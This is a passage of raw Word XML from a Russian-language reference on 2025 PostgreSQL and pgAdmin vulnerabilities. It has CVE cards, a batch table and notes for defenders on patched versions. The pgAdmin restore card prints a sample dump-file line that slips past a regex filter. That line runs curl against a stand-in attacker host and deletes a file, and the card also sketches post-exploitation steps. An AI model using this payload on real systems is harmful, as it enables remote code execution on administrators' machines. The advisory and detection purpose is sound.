          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (13.11.2025).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит атака в логах.</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STATISTICS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от non-admin ролей с target-схемой, отличной от собственной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analytics.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Усиливающий маркер — повторные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE STATISTICS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с одинаковыми именами от одной роли (= перебор имён). Симптом со стороны admin-а: неожиданные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relation already exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при routine optimization-работе.</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Misauth class; концептуально близка к 3.13 (privilege escalation), но severity ниже — даёт не RCE и не data leak, а DoS планировщика. R23 — последний CVE 2025 года, перед PG 13 EOL (13.11.2025).</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advisory CVE-2025-12817</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CVE-2025-13780 — pgAdmin restore regex bypass (полная карточка)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Суть.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plain-text restore feature pgAdmin использовал regex для блокировки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shell-escape метакоманды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загружаемых dump-файлах. Regex ловил конкретно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(newline + восклицательный знак), но не покрывал альтернативные форматировки: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\r\n!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, разные encoding-variations, prefix-spaces (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\n !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Атакующий загружает dump-файл с такой обходной формой → при restore вызов psql выполняет shell-команду на машине pgAdmin. Класс — adjacent ecosystem RCE (не сам PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный payload (концептуальный).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Crafted dump file (fragments):</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PostgreSQL database dump</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SET statement_timeout = 0;</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Линия ниже обходит regex `^\\n!`: используется CR (\r) вместо LF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\r! curl http://attacker.tld/$(whoami) ; rm -f /tmp/innocent.sql</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TABLE legit_table (id int);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ... остальной dump-content ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При попытке pgAdmin импортировать этот файл (восстановление БД через UI) — внутренний вызов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -f file.sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполнит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\r!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-команду, которая шёлл-execute-ит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl ... | sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на хосте pgAdmin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RCE на хосте, где работает pgAdmin — обычно admin workstation или внутренний tooling-сервер. В худшем случае атакующий получает shell с привилегиями pgAdmin process (часто = привилегии DBA-операционной учётки). Дальше — типичные post-exploitation шаги: enumerate credentials в pgAdmin config, lateral movement в БД-инфраструктуру, экстракция backup-credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sanitization regex был построен на whitelist подхода «блокировать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\n!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">», но wire-формат psql принимает любой newline-character (LF, CR, CRLF) как разделитель command-line, и любой leading whitespace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как metacommand. Полный список вариантов sequence-ов не был учтён в blocklist. Класс — incomplete blacklist sanitization, типовая ошибка для security-фильтров на shell-escape sequences. Фикс — переход от regex-blacklist к структурному парсингу dump-файла либо к жёсткому whitelist разрешённых meta-commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Атакующий должен подложить crafted dump-файл в место, откуда pgAdmin его прочитает: загрузка через restore UI, shared filesystem (NFS/SMB), social engineering admin-а импортировать чужой backup. Уязвимы версии pgAdmin до фикс-релиза (точная версия — в advisory).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Версии.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pgAdmin до фикса. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Adjacent ecosystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: вне основного PostgreSQL release cycle. Upgrade pgAdmin требует отдельной координации с DBA-tooling team и не входит в стандартный PG minor-upgrade workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит атака в логах.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Client-side pgAdmin: restore events с dump-файлами от непривычных sources (uploaded files, не из стандартного backup-pipeline). OS-side: процессы shell с parent process pgAdmin executable (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgadmin4.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или подобное) сразу после restore action. Network: outbound HTTP/HTTPS connections от pgAdmin host в момент или сразу после import-операции — особенно к non-corporate destinations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adjacent ecosystem RCE; концептуально близка к R6 (CVE-2025-1094, 3.9.7) — оба про клиентский tooling, оперирующий user-controlled content без полной escape-логики. Также близка к R25 (CVE-2025-8715, 3.12.3) — оба про injection через restore-flow, разные технологии (pgAdmin vs psql).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Источники.</w:t>
      </w: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Cyber Security News coverage</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Сводная таблица batch-ов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Patched minors</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CVSS / severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1337"/>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Деталь</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13.02.2025</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17.3, 16.7, 15.11, 14.16, 13.19</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psql SQL injection</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8.1 (High)</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3.9.7</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13.02.2025</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 chain</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R21</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chain</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via chain)</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+ 3.9.7</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08.05.2025</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17.5, 16.9, 15.13, 14.18, 13.21</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CVE-2025-4207</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R27</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 (GB18030)</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полная карточка выше</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14.08.2025</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17.6, 16.10, 15.14, 14.19, 13.22</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CVE-2025-8713</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R26</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 (stats)</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3.17.4</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14.08.2025</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CVE-2025-8715</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R25</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dump/restore SQLi</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3.12.3</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13.11.2025</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18.1, 17.7, 16.11, 15.15, 14.20, 13.23</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CVE-2025-12817</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R23</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 (CREATE STATISTICS)</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полная карточка выше</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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(pgAdmin)</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CVE-2025-13780</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R24</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Adjacent ecosystem RCE</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337"/>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полная карточка выше</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R24 (pgAdmin) — отдельным advisory вне PostgreSQL release cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст 2025 года</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2025 продолжил тренд multi-CVE batch-ов: четыре отдельных batch-релиза в году (фев / май / авг / ноя) против двух-трёх в 2022–2023. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-1094 — самый severe CVE года</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVSS 8.1, наивысший с CVE-2022-1552): chain-cэт с COPY TO PROGRAM делает её основным production-pentest вектором, особенно в сценариях вокруг BeyondTrust PRA/RS и других wrapper-приложений psql. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 13 EOL объявлен 13.11.2025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — финальный batch 13.23 закрыл R23 как последний patch ветки 13; после этой даты PG 13 не получает security patches, что критично для legacy-кластеров. R23 (CREATE STATISTICS) — closer к feature year-cycle, не major impact, но завершает ноябрьский batch перед EOL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 Версионная таблица минор-релизов и фиксов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Master-таблица «minor × CVE» для defenders. Одна строка на CVE, колонки по major-веткам PostgreSQL: для каждого major показано (a) последняя уязвимая minor, (b) первая patched minor, (c) дата релиза patched minor. По этой таблице можно за секунду ответить: «у меня PG 15.10 — какие CVE открыты?».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Как читать таблицу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Колонка «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Затронуто (≤)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">» — последняя minor, которая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ещё содержит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвимость (= патч не применён до этого minor включительно).</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Колонка «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">» — первая minor, которая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уже содержит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> патч.</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Если major-версия не указана в строке — означает: либо CVE не затрагивает эту major (узкое окно, как CVE-2023-39418 только для PG 15.0–15.3), либо major уже был EOL на момент фикса.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EOL-статусы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (на момент написания, 2026-05-26): PG 12 — EOL 14.11.2024; PG 13 — EOL 13.11.2025. На EOL-major кластерах CVE, опубликованные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">после</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> EOL-даты, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не получают patches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для этой major.</w:t>
      </w:r>
    </w:p>
